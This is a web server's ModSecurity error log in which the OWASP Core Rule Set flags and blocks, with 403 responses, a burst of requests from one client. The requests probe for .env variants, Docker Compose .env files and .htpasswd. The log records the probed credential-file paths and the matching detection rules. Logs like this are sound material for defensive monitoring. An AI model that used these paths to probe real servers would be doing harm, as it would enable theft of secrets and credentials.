[Mon May 11 22:01:48.840317 2026] [security2:error] [pid 1605480:tid 1605539] [client 193.111.117.35:21296] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.production.local"] [unique_id "agI1rB2Cvzd_nyNfUm_2LQAAARE"]
[Mon May 11 22:01:48.840491 2026] [security2:error] [pid 1605480:tid 1605539] [client 193.111.117.35:21296] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.production.local"] [unique_id "agI1rB2Cvzd_nyNfUm_2LQAAARE"]
[Mon May 11 22:01:48.840573 2026] [security2:error] [pid 1588898:tid 1588919] [client 193.111.117.35:21294] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.production"] [unique_id "agI1rKFW67LJTsgN3jQEUQAAABQ"]
[Mon May 11 22:01:48.840717 2026] [security2:error] [pid 1588898:tid 1588919] [client 193.111.117.35:21294] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.production"] [unique_id "agI1rKFW67LJTsgN3jQEUQAAABQ"]
[Mon May 11 22:01:48.840740 2026] [security2:error] [pid 1605480:tid 1605538] [client 193.111.117.35:21346] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rB2Cvzd_nyNfUm_2LAAAARA"]
[Mon May 11 22:01:48.841397 2026] [security2:error] [pid 1605480:tid 1605539] [client 193.111.117.35:21296] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rB2Cvzd_nyNfUm_2LQAAARE"]
[Mon May 11 22:01:48.841904 2026] [security2:error] [pid 1605480:tid 1605540] [client 193.111.117.35:21220] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.bak"] [unique_id "agI1rB2Cvzd_nyNfUm_2LgAAARI"]
[Mon May 11 22:01:48.842144 2026] [security2:error] [pid 1605480:tid 1605540] [client 193.111.117.35:21220] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.bak"] [unique_id "agI1rB2Cvzd_nyNfUm_2LgAAARI"]
[Mon May 11 22:01:48.842879 2026] [security2:error] [pid 1605480:tid 1605540] [client 193.111.117.35:21220] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rB2Cvzd_nyNfUm_2LgAAARI"]
[Mon May 11 22:01:48.846683 2026] [security2:error] [pid 1588898:tid 1588918] [client 193.111.117.35:21466] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.json"] [unique_id "agI1rKFW67LJTsgN3jQEUAAAABM"]
[Mon May 11 22:01:48.846871 2026] [security2:error] [pid 1588898:tid 1588918] [client 193.111.117.35:21466] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.json"] [unique_id "agI1rKFW67LJTsgN3jQEUAAAABM"]
[Mon May 11 22:01:48.847277 2026] [security2:error] [pid 1590352:tid 1590408] [client 193.111.117.35:21584] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.default"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.default"] [unique_id "agI1rK1q0G_aXAqWauTyNQAAAJA"]
[Mon May 11 22:01:48.847453 2026] [security2:error] [pid 1590352:tid 1590408] [client 193.111.117.35:21584] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.default"] [unique_id "agI1rK1q0G_aXAqWauTyNQAAAJA"]
[Mon May 11 22:01:48.847610 2026] [authz_core:error] [pid 1588898:tid 1588911] [client 193.111.117.35:21208] AH01630: client denied by server configuration: /var/www/html/.htpasswd
[Mon May 11 22:01:48.848259 2026] [security2:error] [pid 1590352:tid 1590395] [client 193.111.117.35:21522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rK1q0G_aXAqWauTyMQAAAIM"]
[Mon May 11 22:01:48.848521 2026] [security2:error] [pid 1601130:tid 1601151] [client 193.111.117.35:21534] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rHEgAO_835W6c1mNjQAAAEE"]
[Mon May 11 22:01:48.848618 2026] [security2:error] [pid 1590352:tid 1590399] [client 193.111.117.35:21436] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rK1q0G_aXAqWauTyMgAAAIc"]
[Mon May 11 22:01:48.848880 2026] [security2:error] [pid 1601130:tid 1601171] [client 193.111.117.35:21254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env~"] [unique_id "agI1rHEgAO_835W6c1mNkAAAAFU"]
[Mon May 11 22:01:48.848897 2026] [security2:error] [pid 1601130:tid 1601157] [client 193.111.117.35:21266] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agI1rHEgAO_835W6c1mNkQAAAEc"]
[Mon May 11 22:01:48.848943 2026] [security2:error] [pid 1601130:tid 1601160] [client 193.111.117.35:21412] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rHEgAO_835W6c1mNjgAAAEo"]
[Mon May 11 22:01:48.849041 2026] [security2:error] [pid 1601130:tid 1601171] [client 193.111.117.35:21254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env~"] [unique_id "agI1rHEgAO_835W6c1mNkAAAAFU"]
[Mon May 11 22:01:48.849049 2026] [security2:error] [pid 1601130:tid 1601157] [client 193.111.117.35:21266] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agI1rHEgAO_835W6c1mNkQAAAEc"]
[Mon May 11 22:01:48.849334 2026] [security2:error] [pid 1601130:tid 1601156] [client 193.111.117.35:21570] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/compose/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/docker/compose/.env"] [unique_id "agI1rHEgAO_835W6c1mNkgAAAEY"]
[Mon May 11 22:01:48.849492 2026] [security2:error] [pid 1601130:tid 1601156] [client 193.111.117.35:21570] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/docker/compose/.env"] [unique_id "agI1rHEgAO_835W6c1mNkgAAAEY"]
[Mon May 11 22:01:48.849699 2026] [security2:error] [pid 1601130:tid 1601171] [client 193.111.117.35:21254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rHEgAO_835W6c1mNkAAAAFU"]
[Mon May 11 22:01:48.849757 2026] [security2:error] [pid 1601130:tid 1601157] [client 193.111.117.35:21266] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rHEgAO_835W6c1mNkQAAAEc"]
[Mon May 11 22:01:48.853993 2026] [security2:error] [pid 1601130:tid 1601156] [client 193.111.117.35:21570] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rHEgAO_835W6c1mNkgAAAEY"]
[Mon May 11 22:01:48.893627 2026] [security2:error] [pid 1588898:tid 1588914] [client 193.111.117.35:21498] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rKFW67LJTsgN3jQETgAAAA8"]
[Mon May 11 22:01:48.894473 2026] [security2:error] [pid 1590352:tid 1590405] [client 193.111.117.35:21372] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rK1q0G_aXAqWauTyMwAAAI0"]
[Mon May 11 22:01:48.895502 2026] [security2:error] [pid 1534836:tid 1534886] [client 193.111.117.35:21562] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker-compose/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/docker-compose/.env"] [unique_id "agI1rNeaRXe5lR8y0ZOs5QAAAU8"]
[Mon May 11 22:01:48.895730 2026] [security2:error] [pid 1534836:tid 1534886] [client 193.111.117.35:21562] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/docker-compose/.env"] [unique_id "agI1rNeaRXe5lR8y0ZOs5QAAAU8"]
[Mon May 11 22:01:48.895933 2026] [security2:error] [pid 1588898:tid 1588909] [client 193.111.117.35:21340] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rKFW67LJTsgN3jQETwAAAAo"]
[Mon May 11 22:01:48.896662 2026] [security2:error] [pid 1590352:tid 1590408] [client 193.111.117.35:21584] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rK1q0G_aXAqWauTyNQAAAJA"]
[Mon May 11 22:01:48.899951 2026] [security2:error] [pid 1588898:tid 1588919] [client 193.111.117.35:21294] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rKFW67LJTsgN3jQEUQAAABQ"]
[Mon May 11 22:01:48.900055 2026] [security2:error] [pid 1534836:tid 1534883] [client 193.111.117.35:21476] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rNeaRXe5lR8y0ZOs4wAAAUw"]
[Mon May 11 22:01:48.900229 2026] [security2:error] [pid 1588898:tid 1588918] [client 193.111.117.35:21466] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rKFW67LJTsgN3jQEUAAAABM"]
[Mon May 11 22:01:48.900725 2026] [security2:error] [pid 1534836:tid 1534884] [client 193.111.117.35:21402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rNeaRXe5lR8y0ZOs5AAAAU0"]
[Mon May 11 22:01:48.903866 2026] [security2:error] [pid 1534836:tid 1534891] [client 193.111.117.35:21566] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rNeaRXe5lR8y0ZOs4gAAAVQ"]
[Mon May 11 22:01:48.904561 2026] [security2:error] [pid 1534836:tid 1534886] [client 193.111.117.35:21562] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rNeaRXe5lR8y0ZOs5QAAAU8"]
[Mon May 11 22:01:48.957602 2026] [security2:error] [pid 1534836:tid 1534877] [client 193.111.117.35:21616] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/compose/withpostgres/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/docker/compose/withPostgres/.env"] [unique_id "agI1rNeaRXe5lR8y0ZOs5wAAAUY"]
[Mon May 11 22:01:48.957739 2026] [security2:error] [pid 1588898:tid 1588910] [client 193.111.117.35:21626] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/compose/withmysql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/docker/compose/withMySQL/.env"] [unique_id "agI1rKFW67LJTsgN3jQEUwAAAAs"]
[Mon May 11 22:01:48.957920 2026] [security2:error] [pid 1534836:tid 1534877] [client 193.111.117.35:21616] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/docker/compose/withPostgres/.env"] [unique_id "agI1rNeaRXe5lR8y0ZOs5wAAAUY"]
